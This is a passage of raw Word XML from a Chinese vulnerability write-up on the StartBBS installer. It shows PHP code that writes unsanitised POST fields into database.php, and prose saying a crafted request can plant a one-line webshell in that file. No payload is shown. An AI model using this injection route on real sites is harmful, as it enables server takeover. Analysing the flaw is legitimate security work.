            <v:rect id="_x0000_s10170" style="position:absolute;left:1717;top:9916;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10169" style="position:absolute" from="1712,9916" to="1712,10242" strokeweight=".48pt"/>
            <v:line id="_x0000_s10168" style="position:absolute" from="8266,9916" to="8266,10242" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10167" style="position:absolute;left:1717;top:10242;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10166" style="position:absolute" from="1712,10242" to="1712,10568" strokeweight=".48pt"/>
            <v:line id="_x0000_s10165" style="position:absolute" from="8266,10242" to="8266,10568" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10164" style="position:absolute;left:1717;top:10568;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10163" style="position:absolute" from="1712,10568" to="1712,10894" strokeweight=".48pt"/>
            <v:line id="_x0000_s10162" style="position:absolute" from="8266,10568" to="8266,10894" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10161" style="position:absolute;left:1717;top:10894;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10160" style="position:absolute" from="1712,10894" to="1712,11220" strokeweight=".48pt"/>
            <v:line id="_x0000_s10159" style="position:absolute" from="8266,10894" to="8266,11220" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10158" style="position:absolute;left:1717;top:11220;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10157" style="position:absolute" from="1712,11220" to="1712,11546" strokeweight=".48pt"/>
            <v:line id="_x0000_s10156" style="position:absolute" from="8266,11220" to="8266,11546" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10155" style="position:absolute;left:1717;top:11546;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10154" style="position:absolute" from="1712,11546" to="1712,11872" strokeweight=".48pt"/>
            <v:line id="_x0000_s10153" style="position:absolute" from="8266,11546" to="8266,11872" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10152" style="position:absolute;left:1717;top:11872;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10151" style="position:absolute" from="1712,11872" to="1712,12198" strokeweight=".48pt"/>
            <v:line id="_x0000_s10150" style="position:absolute" from="8266,11872" to="8266,12198" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10149" style="position:absolute;left:1717;top:12198;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10148" style="position:absolute" from="1712,12198" to="1712,12524" strokeweight=".48pt"/>
            <v:line id="_x0000_s10147" style="position:absolute" from="8266,12198" to="8266,12524" strokeweight=".48pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="33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145" type="#_x0000_t202" style="width:327.7pt;height:554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80020F">
                  <w:pPr>
                    <w:spacing w:before="37"/>
                    <w:ind w:left="2833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mysql_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close(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$conn);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="2833" w:right="-13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pacing w:val="-2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/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>data[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>'msg2']="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>安装完成，正在保存配置文件，</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48"/>
                    <w:ind w:left="85" w:right="2232"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>请稍后</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>……</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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$dbconfig = "."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>\$active_group = 'default'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;\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>n"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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."\$active_record = TRUE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;\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>n"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'default']['hostname'] = '".$dbhost."';\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'default']['port'] = '".$dbport."';\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'default']['username'] = '".$dbuser."';\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'default']['password'] = '".$dbpwd."';\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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>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'default']['database'] = '".$dbname."';\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1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'default']['dbdriver'] = 'mysql';\n"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'default']['dbprefix'] = '".$dbprefix."';\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3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'default']['pconnect'] = TRUE;\n"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'default']['db_debug'] = TRUE;\n"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'default']['cache_on'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>] = FALSE;\n"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'default']['cachedir'] = 'app/cache';\n"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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'default']['char_set'] = 'utf8';\n"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73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'default']['dbcollat'] = 'utf8_general_ci';\n"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73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'default']['swap_pre'] = '';\n"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73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'default']['autoinit'] = TRUE;\n"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/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."\$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db[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'default']</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>['stricton'] = FALSE;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="2833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$file = FCPATH.'/app/config/database.php';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ind w:left="999" w:right="223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file_put_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contents(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$file,$dbconfig);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48"/>
                    <w:ind w:left="3747" w:right="-13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保存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config</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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文件</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="3747" w:right="-1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$sub_folder){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before="1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$this-&gt;config-&gt;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update(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'myconfig','sub_folder', $sub_folder);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:right="1784"/>
                    <w:jc w:val="righ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right="481"/>
                    <w:jc w:val="righ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$encryption_key =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="85" w:right="2232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md5(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uniqid());</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:right="262"/>
                    <w:jc w:val="right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$encryption_key){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before="1"/>
                    <w:ind w:left="999" w:right="-1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$this-&gt;config-&gt;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update(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'myconfig','encryption_key',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda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$encryption_key);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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="322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10103" style="width:328.7pt;height:213.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6574,4278">
            <v:rect id="_x0000_s10144" style="position:absolute;left:15;top:5;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10143" style="position:absolute" from="10,5" to="10,331" strokeweight=".48pt"/>
            <v:line id="_x0000_s10142" style="position:absolute" from="6564,5" to="6564,331" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10141" style="position:absolute;left:15;top:331;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10140" style="position:absolute" from="10,331" to="10,657" strokeweight=".48pt"/>
            <v:line id="_x0000_s10139" style="position:absolute" from="6564,331" to="6564,657" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10138" style="position:absolute;left:15;top:657;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10137" style="position:absolute" from="10,657" to="10,983" strokeweight=".48pt"/>
            <v:line id="_x0000_s10136" style="position:absolute" from="6564,657" to="6564,983" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10135" style="position:absolute;left:15;top:983;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10134" style="position:absolute" from="10,983" to="10,1309" strokeweight=".48pt"/>
            <v:line id="_x0000_s10133" style="position:absolute" from="6564,983" to="6564,1309" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10132" style="position:absolute;left:15;top:1309;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10131" style="position:absolute" from="10,1309" to="10,1635" strokeweight=".48pt"/>
            <v:line id="_x0000_s10130" style="position:absolute" from="6564,1309" to="6564,1635" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10129" style="position:absolute;left:15;top:1635;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10128" style="position:absolute" from="10,1635" to="10,1961" strokeweight=".48pt"/>
            <v:line id="_x0000_s10127" style="position:absolute" from="6564,1635" to="6564,1961" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10126" style="position:absolute;left:15;top:1961;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10125" style="position:absolute" from="10,1961" to="10,2287" strokeweight=".48pt"/>
            <v:line id="_x0000_s10124" style="position:absolute" from="6564,1961" to="6564,2287" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10123" style="position:absolute;left:15;top:2287;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10122" style="position:absolute" from="10,2287" to="10,2613" strokeweight=".48pt"/>
            <v:line id="_x0000_s10121" style="position:absolute" from="6564,2287" to="6564,2613" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10120" style="position:absolute;left:15;top:2613;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10119" style="position:absolute" from="10,2613" to="10,2939" strokeweight=".48pt"/>
            <v:line id="_x0000_s10118" style="position:absolute" from="6564,2613" to="6564,2939" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10117" style="position:absolute;left:15;top:2939;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10116" style="position:absolute" from="10,2939" to="10,3265" strokeweight=".48pt"/>
            <v:line id="_x0000_s10115" style="position:absolute" from="6564,2939" to="6564,3265" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10114" style="position:absolute;left:15;top:3265;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10113" style="position:absolute" from="10,3265" to="10,3591" strokeweight=".48pt"/>
            <v:line id="_x0000_s10112" style="position:absolute" from="6564,3265" to="6564,3591" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10111" style="position:absolute;left:15;top:3591;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10110" style="position:absolute" from="10,3591" to="10,3917" strokeweight=".48pt"/>
            <v:line id="_x0000_s10109" style="position:absolute" from="6564,3591" to="6564,3917" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10108" style="position:absolute;left:15;top:3917;width:6545;height:346" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10107" style="position:absolute" from="5,4268" to="6569,4268" strokeweight=".48pt"/>
            <v:line id="_x0000_s10106" style="position:absolute" from="10,3917" to="10,4273" strokeweight=".48pt"/>
            <v:line id="_x0000_s10105" style="position:absolute" from="6564,3917" to="6564,4273" strokeweight=".48pt"/>
            <v:shape id="_x0000_s10104" type="#_x0000_t202" style="position:absolute;left:10;top:5;width:6554;height:4263" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="37"/>
                      <w:ind w:right="1784"/>
                      <w:jc w:val="right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47"/>
                      <w:ind w:right="96"/>
                      <w:jc w:val="righ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Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>$</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>data[</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>'msg3']="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保存配</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="48"/>
                      <w:ind w:left="85" w:right="2232"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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置文件完成！</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="167"/>
                      <w:ind w:left="999" w:right="2232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touch(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FCPATH.'install.lock');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="47"/>
                      <w:ind w:right="217"/>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>$</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>data[</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>'msg4']="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创建锁定安装文件</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:spacing w:val="-64"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>install.lock</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="47"/>
                      <w:ind w:left="85" w:right="2232"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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成功</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="47"/>
                      <w:ind w:right="276"/>
                      <w:jc w:val="righ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Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>$</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>data[</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>'msg5']="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安装</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="48"/>
                      <w:ind w:left="85" w:right="2232"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>startbbs</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:spacing w:val="-70"/>
                        <w:sz w:val="18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成功！</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="1916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1"/>
                      <w:ind w:left="1916" w:right="-1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$this-&gt;load-&gt;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view(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'install',$data);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="999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pStyle w:val="a3"/>
        <w:spacing w:line="259" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="239"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的参数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，就执行安装函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_install_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="16" w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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里初始化了数据库，并把数据库配置文件写入了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  <w:w w:val="95"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>/app/config/database.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>”。于是，我们可以构造一下数据包直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把一句话写入到这个配置文件里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="837" w:right="3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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们看到，这个函数接收了许多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$dbhost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'dbhost');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$dbport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'dbport');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$dbname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'dbname');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$dbuser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'dbuser');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$dbpwd =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>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'dbpwd')?$this-&gt;input-&gt;post('dbpwd'):'';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$dbprefix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'dbprefix');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$userid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'admin');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 xml:space="preserve">$pwd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>d5(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$this-&gt;input-&gt;post('pwd'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$email = $this-&gt;input-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
